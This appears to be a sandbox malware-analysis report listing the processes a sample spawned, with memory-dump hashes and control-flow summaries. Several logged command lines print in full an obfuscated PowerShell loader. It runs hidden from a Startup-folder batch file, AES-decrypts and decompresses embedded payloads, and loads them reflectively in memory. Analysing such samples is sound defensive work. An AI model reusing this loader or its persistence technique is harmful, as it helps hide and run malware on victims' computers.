                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:12
                                              Start time:09:41:14
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:13
                                              Start time:09:41:16
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:14
                                              Start time:09:41:26
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:15
                                              Start time:09:41:26
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:16
                                              Start time:09:41:26
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:17
                                              Start time:09:41:26
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:18
                                              Start time:09:41:27
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:19
                                              Start time:09:41:27
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:20
                                              Start time:09:41:28
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:21
                                              Start time:09:41:28
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\timeout.exe
                                              Wow64 process (32bit):false
                                              Commandline:timeout /nobreak /t 1
                                              Imagebase:0x7ff65c8f0000
                                              File size:32'768 bytes
                                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:23
                                              Start time:09:41:35
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" "
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:24
                                              Start time:09:41:36
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:25
                                              Start time:09:41:36
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:26
                                              Start time:09:41:36
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:27
                                              Start time:09:41:36
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 
5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:28
                                              Start time:09:41:36
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:29
                                              Start time:09:41:37
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:30
                                              Start time:09:42:08
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\timeout.exe
                                              Wow64 process (32bit):false
                                              Commandline:timeout /nobreak /t 1
                                              Imagebase:0x7ff65c8f0000
                                              File size:32'768 bytes
                                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1767052834.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7ffd9b980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d25ffef01bd92184da78942e1bcd6a367ba20cf4ffca2b02b28d984685acdf0e
                                                • Instruction ID: 8e09512f697aac64d5eb713da4fcce746ee644036b9eb73493a91660a6f2ff8a
                                                • Opcode Fuzzy Hash: d25ffef01bd92184da78942e1bcd6a367ba20cf4ffca2b02b28d984685acdf0e
                                                • Instruction Fuzzy Hash: F0012832B0EA891FEB55DAA850A09F9BBE2EF58321F1800BFC05DDB193C92558098351
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1766766147.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7ffd9b8b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e704c2f9787c5482f3ef504e6ed8ef1b0faa200ce0f5ae5831ad015ab4922c7
                                                • Instruction ID: d32098309b1a6811cd9a6615f808be0c1925d9f0fe18ef4f00fb21267d00c869
                                                • Opcode Fuzzy Hash: 4e704c2f9787c5482f3ef504e6ed8ef1b0faa200ce0f5ae5831ad015ab4922c7
                                                • Instruction Fuzzy Hash: 0401A73120CB0C4FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1DA32E881CB41
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1767052834.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7ffd9b980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2692ad9e322ad0c9fbd91898679f6db353be5e8344f9b0e9935620a9a5139eed
                                                • Instruction ID: 090d1553240060023d88f8a6c0daac1a3861e33318e2bc35d66533298a0e6ff2
                                                • Opcode Fuzzy Hash: 2692ad9e322ad0c9fbd91898679f6db353be5e8344f9b0e9935620a9a5139eed
                                                • Instruction Fuzzy Hash: CEF0E232B0EA880FEB15E6ACA0A4AE8BBE1EF58324F1800BFC05DD61D3D92904458360

                                                Execution Graph

                                                Execution Coverage:2.5%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:5
                                                Total number of Limit Nodes:1
                                                 Execution graph (node/edge list rendered as text): 7ffd9babd4f9 -> 7ffd9babd50f; 7ffd9babd50f -> 7ffd9babd552; 7ffd9babd50f -> 7ffd9babd67d (CreateFileW); 7ffd9babd67d -> 7ffd9babd6de

                                                Control-flow Graph

                                                 Control-flow graph of the function starting at 7ffd9bab6d80 (basic blocks 7ffd9bab6d80 through 7ffd9babcf2d; the executed/not-executed block colouring and the full edge list are graph data omitted here). Call targets appearing in the graph: 7ffd9bab6de0, 7ffd9bab6e00, 7ffd9bab4620, 7ffd9bab7be8, 7ffd9bab7b98, 7ffd9babcf2e, 7ffd9bab2ed8.
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2427582749.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ZM_H$d
                                                • API String ID: 0-3932459425
                                                • Opcode ID: 2d7c6ab266aee9160495a2b060b6e57b040f0bae764e8314a08d21f1434009b7
                                                • Instruction ID: 6b946636a6493f1ad7bad025611ef7c72f8c44618eb7617460f5845b13a37ba7
                                                • Opcode Fuzzy Hash: 2d7c6ab266aee9160495a2b060b6e57b040f0bae764e8314a08d21f1434009b7
                                                • Instruction Fuzzy Hash: 6E828A31B1EA8D4FE769DB6888659B577D1FF55310F0402BED09EC71A7EE28A8438780

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2427582749.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ZM_H
                                                • API String ID: 0-3096618608
                                                • Opcode ID: 9aff4c675a3d817d0c645530905f44588a584f1a2cbbd57365dede246fccc881
                                                • Instruction ID: 47fb9315b613fe0349cbbd4dadb6cea566ba001966bafd32963175b70bce689f
                                                • Opcode Fuzzy Hash: 9aff4c675a3d817d0c645530905f44588a584f1a2cbbd57365dede246fccc881
                                                • Instruction Fuzzy Hash: 04E16A72B1E9890FE758DB7C446A5F977D1EF59210B0542FED09ECB2A7ED2858028740

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2427582749.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ZM_H
                                                • API String ID: 0-3096618608
                                                • Opcode ID: dbf90a2c18cf7d1c3276be2fc9ad3b8c5d821f96ce337db92e1b4e2e8dcf1d10
                                                • Instruction ID: a0900a1f240cbda02eb045e64b859e576d6266bf5a27cdc179a69182a73eca72
                                                • Opcode Fuzzy Hash: dbf90a2c18cf7d1c3276be2fc9ad3b8c5d821f96ce337db92e1b4e2e8dcf1d10
                                                • Instruction Fuzzy Hash: AFB16972B1E9890FE758DB7C047A5B97BD1EF59210B0546FED09ECB6E3ED2858028740

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2427582749.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b3c3ec2fd961d6a4bd45225f78a71009be90b53771e33732020d96c64c8e2ee6
                                                • Instruction ID: d9a036d0c5cd730049e5465db4edffaa004335b4e3d604eaf32293dbd06d0d2f
                                                • Opcode Fuzzy Hash: b3c3ec2fd961d6a4bd45225f78a71009be90b53771e33732020d96c64c8e2ee6
                                                • Instruction Fuzzy Hash: CBA16872B1E9890FE7589B7C047A5B97BD1EF59210B0946FED09ECB6E3ED1868028740

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2427582749.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: d39c6acd0667e8212c428686329afebc3c18da2bf765acd8ea3ace8569bcd345
                                                • Instruction ID: 25031ce322ee679d86215a2db69964959519fb544fce72e486a70c9c9d4e5596
                                                • Opcode Fuzzy Hash: d39c6acd0667e8212c428686329afebc3c18da2bf765acd8ea3ace8569bcd345
                                                • Instruction Fuzzy Hash: F5713B71A0DA4C4FD758DF6C9859AA97BE0FF59314F0402BEE09DD32A2DF74A8018B81

                                                Control-flow Graph

                                                 Control-flow graph of the function starting at 7ffd9bb815dd (basic blocks 7ffd9bb815dd through 7ffd9bb81b41; the executed/not-executed block colouring and the full edge list are graph data omitted here). No call targets appear in this graph.
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2428856960.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_7ffd9bb80000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 863376df2adf84df008f0e9c6cb30eb196b1e3442ab3111826ff3b40989d9951
                                                • Instruction ID: c813e1455bb6128ee49d92a66c02d9e914afeff6c52178782489bb1614b5a98c
                                                • Opcode Fuzzy Hash: 863376df2adf84df008f0e9c6cb30eb196b1e3442ab3111826ff3b40989d9951
                                                • Instruction Fuzzy Hash: 09120661A0FBC90FE3A6977858755B47BE1EF5A214F0A01FFD089C71E3D9289906C392
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2427582749.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: uU_I$xJ_L$yJ_L$~U_I
                                                • API String ID: 0-3052503429
                                                • Opcode ID: 5976804176e1774b3e14797a0c3b07b5bb3cfea364146f7e80eb1a6a5872f85a
                                                • Instruction ID: a548759ca572cd96242c978b5cc97d58376bfae6f0165f9169fc64b98d79986a
                                                • Opcode Fuzzy Hash: 5976804176e1774b3e14797a0c3b07b5bb3cfea364146f7e80eb1a6a5872f85a
                                                • Instruction Fuzzy Hash: CAE2E531B1A90E4FEBA8DB6CC4A5A7473D1EF94350B5601BAD00EC72B6DE69FD428740

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph: basic-block edge list for the function starting at 7ffd9bacdd80 (blocks spanning 7ffd9bacdd80-7ffd9bace494; rendered graph not recoverable as text). Calls made from this function: 7ffd9babed68, 7ffd9babeb38, 7ffd9babed00, 7ffd9babed78, 7ffd9babede8, 7ffd9babedd0, 7ffd9babed38, 7ffd9babed70, 7ffd9bac7c70, 7ffd9babed60, 7ffd9babed90, 7ffd9babed58 and 7ffd9bace495.
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2427582749.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \L_H
                                                • API String ID: 0-2621150107
                                                • Opcode ID: 408e92291795f893e0733d91cfb75457ec282012befc2e550ed76c99058eeed0
                                                • Instruction ID: a09e3c1556dd15d3927232663e1e5d7a0adabc9326f05183c81994615b78f70f
                                                • Opcode Fuzzy Hash: 408e92291795f893e0733d91cfb75457ec282012befc2e550ed76c99058eeed0
                                                • Instruction Fuzzy Hash: 5342E031B19A4D4FEBA4EB5C8864A7973E1FFA8350F0501BAE44DC72A6DE64FC418781